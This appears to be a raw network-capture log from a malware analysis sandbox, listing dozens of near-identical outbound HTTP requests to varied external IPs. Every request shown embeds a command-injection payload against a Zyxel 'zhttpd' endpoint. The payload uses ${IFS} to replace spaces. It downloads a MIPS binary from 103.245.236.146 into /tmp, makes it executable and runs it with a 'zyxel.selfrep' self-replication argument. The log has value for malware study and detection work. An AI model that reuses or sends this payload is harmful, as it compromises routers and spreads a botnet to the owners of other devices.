                                              Jan 29, 2024 07:04:00.206598997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6783192.168.2.1458236213.74.207.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206634998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6784192.168.2.1450788223.155.186.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206688881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6785192.168.2.145396218.86.241.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206718922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6786192.168.2.144426848.86.171.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206753016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6787192.168.2.145899074.232.55.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206784964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6788192.168.2.1460258132.187.196.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206824064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6789192.168.2.1440238150.255.41.167443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206852913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6790192.168.2.145351824.2.146.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206883907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6791192.168.2.14395828.253.58.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206935883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6792192.168.2.145864495.194.120.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.206969023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6793192.168.2.1449378121.183.42.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207020044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6794192.168.2.1440808140.150.66.132443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207050085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6795192.168.2.1445994124.75.58.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207092047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6796192.168.2.144693843.0.243.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207114935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6797192.168.2.145213653.210.48.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207149029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6798192.168.2.1440056223.253.237.134443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207197905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6799192.168.2.144916058.38.118.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207251072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6800192.168.2.1445274203.76.19.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207277060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6801192.168.2.145118617.146.224.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207324028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6802192.168.2.1460614195.128.176.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207331896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6803192.168.2.144917052.246.115.68443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207371950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6804192.168.2.1446930187.86.242.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207400084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6805192.168.2.1439562104.22.175.217443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207432985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6806192.168.2.1436342185.55.58.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207493067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6807192.168.2.14593165.23.28.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207531929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6808192.168.2.1454826201.67.183.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207580090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6809192.168.2.1438842122.202.183.186443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207612038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6810192.168.2.144733094.88.164.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207649946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6811192.168.2.145311839.24.94.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207698107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6812192.168.2.1444956159.102.215.247443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207726002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6813192.168.2.145570823.34.177.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207770109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6814192.168.2.14472421.208.198.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207818031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6815192.168.2.143631441.218.176.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207840919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6816192.168.2.14341244.216.120.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207895994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6817192.168.2.1460164159.170.195.171443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207933903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6818192.168.2.1454250199.210.168.160443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.207973957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6819192.168.2.144270692.196.113.37443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208009958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6820192.168.2.143751665.218.103.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208039999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6821192.168.2.1460148176.223.49.33443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208086967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6822192.168.2.1453980132.152.194.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208117008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6823192.168.2.1439524158.119.248.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208158016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6824192.168.2.144386013.27.132.51443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208188057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6825192.168.2.1458312140.236.144.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208235979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6826192.168.2.1457090164.69.223.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208287954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6827192.168.2.1436466212.212.65.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208319902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6828192.168.2.1446482104.147.105.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208370924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6829192.168.2.144956473.136.101.93443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208420038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6830192.168.2.1450500154.101.159.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208461046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6831192.168.2.1456706209.54.95.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208492041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6832192.168.2.1435972118.104.29.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208523989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6833192.168.2.1442948190.196.83.21443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208580017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6834192.168.2.144206889.235.223.38443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208615065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6835192.168.2.1437076153.60.129.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208667994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6836192.168.2.144483473.76.223.206443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208693981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6837192.168.2.1432904143.44.121.205443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208743095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6838192.168.2.1433940125.138.107.131443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208790064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6839192.168.2.143300491.217.143.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208833933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6840192.168.2.1450410205.158.46.145443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208873034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6841192.168.2.1457628155.38.187.6443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208900928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6842192.168.2.1450634159.89.157.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208939075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6843192.168.2.145332698.81.111.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.208966017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6844192.168.2.1458286168.35.91.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209012985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6845192.168.2.144084635.179.234.14443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209043980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6846192.168.2.1455586152.115.198.155443
                                              TimestampBytes transferredDirectionData
